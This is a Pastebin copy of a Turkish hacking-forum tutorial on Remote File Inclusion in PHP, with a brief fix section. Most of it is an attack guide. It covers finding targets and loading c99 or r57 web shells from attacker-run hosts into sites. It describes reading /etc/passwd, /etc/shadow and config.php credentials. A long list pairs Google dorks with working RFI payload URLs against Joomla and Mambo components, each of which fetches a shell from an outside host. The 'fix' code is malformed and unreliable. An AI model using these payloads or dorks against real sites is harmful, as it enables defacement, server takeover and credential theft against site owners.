Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Yazar => KingSkrupellos
- Konu => https://www.cyberizm.org/cyberizm-remote-file-inclusion-rfi-hack-genis-dokuman-resimli-videolu-anlatim.html
- Remote File Inclusion RFI Hack Geniş Döküman + Resimli Videolu Anlatım
- Merhaba arkadaşlar ben KingSkrupellos. Bugün size Remote File Inclusion ( RFI ) Difeys hakkında bilgilendirme yapıcağım. Rfi nedir, ne işe yarar, RFI Difeys nasıl yapılır. RFI açıkları nasıl kapatılır. Güncel RFI Açıkları hakkında bilgi vermek istiyorum ve bu açıklar nasıl kullanılır yada sitenizde açıklar varsa kapatabilirsiniz.
- [img]http://hizliresimyukle.com/images/2014/08/22/1900ac.png[/img]
- [img]http://hizliresimyukle.com/images/2014/08/22/2c312d.jpg[/img]
- Not : Konuyu UlakBilim.Gov.Tr’den alıntı yaparak ve diğer sitelerden alarak toplu bir şekilde, aralara kendi bilgilerimide katarak, hatta derleyip toparlayıp bir döküman hazırladım sizlere.
- Videolu Anlatımlar =>
- [code]http://www.youtube.com/watch?v=6zJDeRsoULM
- http://www.youtube.com/watch?v=Sy9ihNiCJ1Y
- http://www.youtube.com/watch?v=iHo51gVwAkI
- http://www.youtube.com/watch?v=4-DIAdmSgRk
- http://www.youtube.com/watch?v=BJP1TRrLRE8
- http://www.youtube.com/watch?v=dN34UDfhLiA
- http://www.youtube.com/watch?v=Lg9UdKL1Cfw
- http://www.youtube.com/watch?v=bCy_5smSRys
- http://www.youtube.com/watch?v=qwRdrvr17II
- http://www.youtube.com/watch?v=QME9o6FTXwU
- http://www.youtube.com/watch?v=_vkDGSpMYrw
- http://www.youtube.com/watch?v=e5yGxP0XqJQ
- http://www.youtube.com/watch?v=hXRrZL4vqTw [/code]
- Remote File Inclusion (RFI) günümüzde siklikla web sayfalarinin deface edilmesinde veya web sunucularinin hack edilmesinde kullanilan bir yöntem olmutur. Bu kadar çok hataya neden olan web kodlarini yazan veya gelitirenlerin dikkatsizce kod yazmalari, sistem yöneticilerinin de sunucular üzerinde yeteri kadar önlem almamalaridir.
- Rfi Nedir ?
- Rfi “Remote File İnclusion” uzaktan dosya çağırmaktır.
- Nasıl oluşur ?
- Rfi kod yazan kişilerin PHP scriptlerinde Yaptığı hatalardan Kaynaklanır. Sadece Php dili ile yazılmış scriptlerde bulunur.
- include
- include_once
- require
- require_once
- Bu Değerler dosya dahil etme kodlarıdır.Eğer Admin Bu dosyaları Tanımlamaz ise Boş kalır.Bizde Bu Boş olan yeri Yani Tanımlanmayan Değeri Shell Adresi ile doldurup serverde Shell Çalıştırabiliriz.
- Basitce Örnek:
- helper.php = Dosyasını incelediğimizde
- Burada ‘Shellman’ tanımlanmamış.
- Yani biz bunu ’ http://www.siteadresi.com/helper.php…n=Shelladresi? ’
- Shell adresi ile doldurabiliriz.Sonuç olarak Servere Shell Atmış olduk.
- RFI Açığı Tespiti ve Uzaktan Dosya Dahil Etmek - Döküman
- Bu makalemizde size rfı, açıklarının nasıl meydana geldiğini, uzaktan dosya çağırma işlemini, shell çağırma yöntemini rfı, açığını nasıl fixleyeceğimizi (kapatabileceğimizi) kodlarla ve örneklerle anlatmaya çalışacağım.
- Bildiğiniz üzere (Remota File İnclusion) uzaktan dosya çağırmak anlamına gelmektedir.
- 1-RFI açığı nasıl oluşur
- 2-Tanımlama nasıl yapılır
- 3-RFI Açığı Tesbiti
- 4-Shell Dahil Etmek
- 5-Örnek RFI bug
- 6-Örnek RFI Fix
- 7-RFI Açıkları nasıl bulunur.
- 1-Rfı açığı nasıl oluşur?
- RFI, web uyguklamalarındaki hatalı kodlamadan dolayı oluşur. Bir kodla örnek verecek olursak;
- İnclude (“$haberler/spor/sanat.php); buradaki dolar işaretinden dolayı uzaktan dosya çağırma mümkündür. Kodlama bu şekilde tanımlanmadan scripte dahil edilirse, kesinlikle uzaktan dosya çağırmaya Başka bir örnekle pekiştirelim.
- İnclude
- include_once
- require
- require_once
- Scripti kodlayan kişi tanımlamadan bu kodları scripte dahil ederse, uzaktan dosya çağırma işlemi mümkün olmuş, olur.
- 2-Tanımlama nasıl yapılır
- include ("$haberler/spor/sanat.php"); Tanımlanmamış kod.
- <?php
- $haberler/spor/sanat.php =’tanımlı değer’
- include ("$haberler/spor/sanat.php");
- ?>
- Bu şekilde haberler, spor, sanat üçlüsünü tanımlamış olduk.
- 3-Rfı açığı tespiti
- Hedef siteyi açtığınızda rfı açığı olup olmadığını anlamak için siteye hata verdirmeniz, gerekmektedir
- Örneğin;
- www.hedefsite.com/articles.php?id=10
- www.hedefsite.com/articles.php?id=http://www.cyberizm.org bu şekilde yönlendirmeye çalışıyoruz. Siz istediğiniz sayfaya yönlendirebilirsiniz. Örnek olarak söylüyorum, şayet cyberizm’nin anasayfası gelirse, bu sitede rfı açığı var demektir. Bazı rfı açıklarında ise sitenin kendi üzerinde hata vermektedir. Bu sitelerde de rfı arnılabilir. Evet açığı olduğunu düşündüğümüz shell çağırma işlemimizi deneyebiliriz.
- 4-Shell Dahil Etmek
- Burada shell çağırırken yukarıda bahsetmiş olduğumuz yönlendirme işlemini gerçekleştireceğiz. Öncelikle kendi hotsunuza txt halinde shell yüklemeniz gerekiyor. Host adresiniz free olabilir. Örneğin; c99.txt şeklinde. Daha sonra uzaktan bu txt dosyasını yönlendirme işlemi ile hedef sitemize dahil edeceğiz.
- www.hedefsite.com/articles.php?id=http://bizimsitemiz.net/c99.txt?
- Evet bu şekilde sitenize yüklediğiniz txt uzantılı shell’i hedef siteye yüklemiş olursunuz.
- 5-Örnek Rfı bug
- Eğer scriptlerde rfı bug arıyorsanız, bunları iyi bilmeniz gerekmektedir. Örnek bir rfı bug yapalım.
- <?php
- $page = $_GET [page]; Rfı açığı burada page değerinde
- include($page);
- ?>
- 6-Örnek RFI Fix
- Scriptlerdeki bugları bu konuda verilmiş örnekleri baz alarak kapatabilirsiniz.
- <?php
- $page = $_GET"./"; Bu kodlamalar ile rfı açığımızı fixlemiş olduk.
- include($page);
- ?>
- 7-RFI Açıkları nasıl bulunur
- RFI, açıklarını mevcut dorklarla ve scannerlerle bulabilirsiniz.
- Örnek Dorklar;
- inurl:"com_sitemap"
- inurl:"com_hashcash"
- inurl:"com_colophon" vs..
- Ayrıca hedef site üzerinde rfı açığından şüpheleniyorsanız, scannerlerle taratabilirsiniz. Ya da örneklerlede belirttiğimiz gibi manuel açık arayabilirsiniz. Tercihinize kalmış. Şimdilik dökümanımız bu kadar.
- YÖNTEM
- Rfi Açıklarını Kullanarak Hack Yapacagız;
- Önce bakalım nedir bu rfi ? RFI: Remote File İncludes söz öbeğinin kısaLtıLması
- olup Türkçe karşılıgı Uzaktan Dosya Çalıştırma oldugunu söyleyebiliriz. Peki nedir uzaktan dosya çalıştırmak veya include etmek. Basitçe anlatmaya çalışırsak PHP kodlamasında include komutu ile çalıştırılması gereken dosyanın yolu gösterilir. Ve bu yolu kullanarak o dosya yerıne bizim istediğimiz başka bir dosyayı(kodu) site üzerinde çalıştırma olayına RFİ diyoruz..
- Peki PHP Coderlarının Yaptıgı Bu Kodlama Hatası Bizim Ne İşimize Yarar?
- Eğer site (yani server) üzerinde serverdaki dizinleri gösterebilen servera dosya upload edebilen gerektiğinde port açabılen kodlar bulunan bir dosya çalıştırılırsa işte bu "defacer" için büyük bir fırsat oluyor ç). RFI açıkları sayesınde sadece acık olan bı sıteye değil tüm servera hakım olabılıyorsunuz.
- ListPath Nedir?
- Bu server üzerinde erişime sahip olmamıza yarayan kodlara listpath diy0ruz
- piyasada bir sürü listpath mevcut (c99,r57 gibi)
- Rfi Açıklarını Nerden Bulurum ?
- Bu acıkları sitemizdeki dökümanlardan bulabılırsınız veya kendınızde olmayan bir açık yaratabılırsınız. Kodlama hatalarından bahsettik.
- Ne Gibi Hatalar Rfi Açıklarına Sebep Olur?
- PHP kodlamalarında kullanılan şu komutlar bizim için önemli:
- include
- include_once
- require
- require_once
- Bunların oldugu yerlere bakıcaz RFİ ararken.. Şimdi örneklerle açıklayalım:
- Yeni portallardan biri olan PHP-Nuke 8.0 Final daki kodları inceliy0ruz ve bakıyoruzki şöyle bir kodlama yapılmıs
- Kod:
- include($modpath);in nuke8/html/modules.php
- $ karakterının yanındaki modpath bizim için önemli. Dosya calıstırma yolumuz modpast oluyor ve açık şu şekilde yazılıyor;
- http://www.hedefsite.com/html/module...odpath=http://
- Not: Shellimizi bir h0stun içine atmamız gerek,piyasada mevcut.
- Başka bir kod inceleyelim
- Kod:
- include($phpbb_root_path .'extension.inc'); in nuke8/html/modules/Forums/index.php
- Böyle bi durumda ise
- http://www.hedefsite.com/html/module...hpbb_root_path
- Bu acıklardan nasıl saldırı yapabılırız 2 saldırı cesıdı vardır
- 1) Rastgele Saldırı
- 2) Sistemli Saldırı
- Rastgele saldırıyı şu şekilde yapabilirsiniz RFİ Acıgının oldugu p0rtalı kullanan siteleri o portal ile özdeşleşmiş bir arama ile google'da ararız.
- Örnek:
- Php-Nuke 7.8 i kullanan siteleri bulmak için
- Kod:
- Copyright 2005 By Francisco Burzi
- Bu şekilde veya sitemızde mevcut acıklarla site hackleyebılırsınız perllerın izin verdiği ölçüde
- Perm demişken bu konudanda bahsetmemiz gerekiyor çünkü yazma yetkisi önemlidir. Örneğin bi sitenin serverına rfi ile girdik ve index.php'nin yanında şöyle yazıy0r
- rwxr-x---
- Burdaki r,w,x ne anlama geliy0r kısaca anlatayım
- R:Okuma İzni
- W:Yazma İzni
- X:Çalıştırma izni
- Şimdi az c0k anladınız ne 0ldugunu ama tam değil çünkü kim çalıştırabılır kım okuyabılır şuradan anlıy0ruz:
- Yukarıdaki 9 karakter yanyana yazılmıs 3'ü dosya sahibinin yetkilerini 3 tanesı kullanıcı grubunun yetkılerını sonuda her hangi birinin yetkılerını gösteriy0r.
- Şimdi geldik asıl önemli olan sistemli saldırıya
- 1) Hedef Sitenin Portalını Öğrenmek
- 2) Hazır portal değil ise siteyi hosttan çekmek
- 3) Sitede acık yok ise serverdaki başka siteye bakmak
- 4) Acıkk var ise dizine ullaşmak
- 5) Serverda safe mod Off ise yönetıcı olmaya calısmak
- 6) Permler izin vermiy0rsa config okuyarak hack
- Kısaca anlatayım hepsınden bıraz..
- Sitenin portalını öğrenmek gerek bu yuzden sıteyi iyice gezın sağda solda powered veya copyright portal ile ilgili birşey varsa bulduk ve portalı google'dan aratıp acıklarını arayacagız yoksa rfi scanner..
- Ama adam kendı kodlamıs diyelim, ozaman acık y0k diyemeyız! İntell,Tamper,Flashget gibi programlarla siteyi taratıy0ruz 20-30 dakika sürebılır ama hedef için değer.. Ama yine acık bulamadık ise
- Sitenin ipsini başlat çalıştır cmd ftp hedefsite.com yazıp İP bulacagız ve o ip'yi www.whois.cs sitesınde aratacagız ve farklı siteler cıkıcak bu sefer bu cıkan sıtelerde rfi arayacagız.
- Nihayet bulduk ve k0dumuz ile girdik. şimdi hedef dizine ulaşmaya calısmak
- Öncelıkle standart bi şekılde kullanıcıların ısımlerının yazılı oldugu klasör olan /etc/passwd klasorune ulaşmaya calısıy0ruz, bulamadıysak
- /etc/vdomainaliases
- /var/named
- /etc/shadow
- /var/mail
- /etc/secure
- Misal bi etc/passwd şu şekildedir
- root:x:0:0:root:/root:/bin/bash
- şeklindedir
- Burdan anlayacagımız şey var/hosts/hedefsite dizininde bulunuy0r ve biz bu dizin ile girdik, 0Lmadı by-Passs
- Girdik s0nunda Safe MOd: On ise işimiz zor ama off ise root oLacagız.
- THT Üyeleri ; Safe mod on olduğunu düşünürsek önceden bunun metodlarını paylaştım forumda biraz araştırın //PoisonScorpion
- Girdik fakat permler yazmamızı engelliy0r bu sefer config okuyarak hack yapacagız. Bu durumda sitenin config.php dosyalarını okuyarak hack yapmaktır
- Bu işlemi c99 ile yapabılırız. Bir config.php şu şekıldedır
- $dbhost="local host";
- $dbuname)"root";
- $dbpass"123456"
- [code]Google araması:
- inurl:"com_joomlaboard"
- Code:
- components/com_joomlaboard/file_upload.php?sbp=http://uyuSsman.by.ru/c99.txt?
- components/com_joomlaboard/image_upload.php?sbp=http://uyuSsman.by.ru/c99.txt?
- Google araması:
- inurl:"com_pollxt"
- Site Sonuna:
- /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=Shell adresı
- Google Araması:
- inurl:"com_admin"
- Code:
- administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:index.php?option=com_simpleboard
- Code:
- /components/com_simpleboard/file_upload.php?sbp=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_hashcash"
- Code:
- /components/com_hashcash/server.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_htmlarea3_xtd-c"
- Code:
- /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_sitemap"
- Code:
- /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_forum"
- Code:
- /components/com_forum/download.php?phpbb_root_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_pccookbook"
- Code:
- components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:index.php?option=com_extcalendar
- Code:
- /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"minibb"
- Code:
- components/minibb/index.php?absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_smf"
- Code:
- /components/com_smf/smf.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- /modules/mod_calendar.php?absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_pollxt"
- Code:
- /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_loudmounth"
- Code:
- /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_videodb"
- Code:
- /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:index.php?option=com_pcchess
- Code:
- /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_multibanners"
- Code:
- /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_a6mambohelpdesk"
- Code:
- /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_colophon"
- Code:
- /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_mgm"
- Code:
- administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_mambatstaff"
- Code:
- /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_securityimages"
- Code:
- /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- /components/com_securityimages/lang.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_artlinks"
- Code:
- /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_galleria"
- Code:
- /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:"com_zoom" Bulunan Sonuç : 3.560.000
- Code:
- components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
- components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://uyussman.by.ru/r57.txt?
- Google Araması:
- inurl:"com_serverstat"
- Code:
- /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- ''inurl:mambo'' googlede aratıyoruz
- components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://uyuSsman.by.ru/c99.txt?
- Google Araması:
- inurl:index.php?option=com_simpleboard
- KOD:
- /components/com_simpleboard/file_upload.php?sbp=http://hitbaytar.kayyo.com/c99shell.txt?
- ---------------------------------------------------------------
- Google Araması:
- inurl:"com_hashcash"
- KOD:
- /components/com_hashcash/server.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- ------------------------------------------------------------------------------
- Google Araması:
- inurl:"com_htmlarea3_xtd-c"
- KOD:
- /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- ------------------------------------------------------------------------------------
- Google Araması:
- inurl:"com_sitemap"
- KOD:
- /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- --------------------------------------------------------------------
- Google Araması:
- inurl:"com_forum"
- KOD:
- /components/com_forum/download.php?phpbb_root_path=http://hitbaytar.kayyo.com/c99shell.txt?
- --------------------------------------------------------------------
- Google Araması:
- inurl:"com_pccookbook"
- KOD:
- components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------------------
- Google Araması:
- inurl:index.php?option=com_extcalendar
- KOD:
- /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"minibb"
- KOD:
- components/minibb/index.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_colophon"
- KOD:
- /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_mgm"
- KOD:
- administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_mambatstaff"
- KOD:
- /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_securityimages"
- KOD:
- /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- KOD:
- /components/com_securityimages/lang.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_artlinks"
- KOD:
- /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http: http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_galleria"
- KOD:
- /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- ---------------------------------------------------------------------
- Google Araması:
- inurl:"com_smf"
- KOD:
- /components/com_smf/smf.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- KOD:
- /modules/mod_calendar.php?absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_pollxt"
- KOD:
- /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_loudmounth"
- KOD:
- /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- ------------------------------------------------------------------------
- Google Araması:
- inurl:"com_videodb"
- KOD:
- /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http ://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:index.php?option=com_pcchess
- KOD:
- /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_multibanners"
- KOD:
- /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=ht tp://hitbaytar.kayyo.com/c99shell.txt?
- -----------------------------------------------------------------------
- Google Araması:
- inurl:"com_a6mambohelpdesk"
- KOD:
- /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http ://hitbaytar.kayyo.com/c99shell.txt?
- Kaynaklar =>
- https://evilzone.org/tutorials/remote-file-inclusion%28rfi%29/
- http://csirt.ulakbim.gov.tr/dokumanlar/PHP_RFI_SaldiriEngelleme.pdf
- http://www.imperva.com/docs/HII_Remote_and_Local_File_Inclusion_Vulnerabilities.pdf [/code]
- Not 2 : Bazı kaynakları direk alıntı olarak aldım, bazılarını ise kendim derleyip toparlayıp bir daha yazdım, konuya uygun videolar koydum ve resimler upload ettim. Lütfen Emeğe Saygı.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement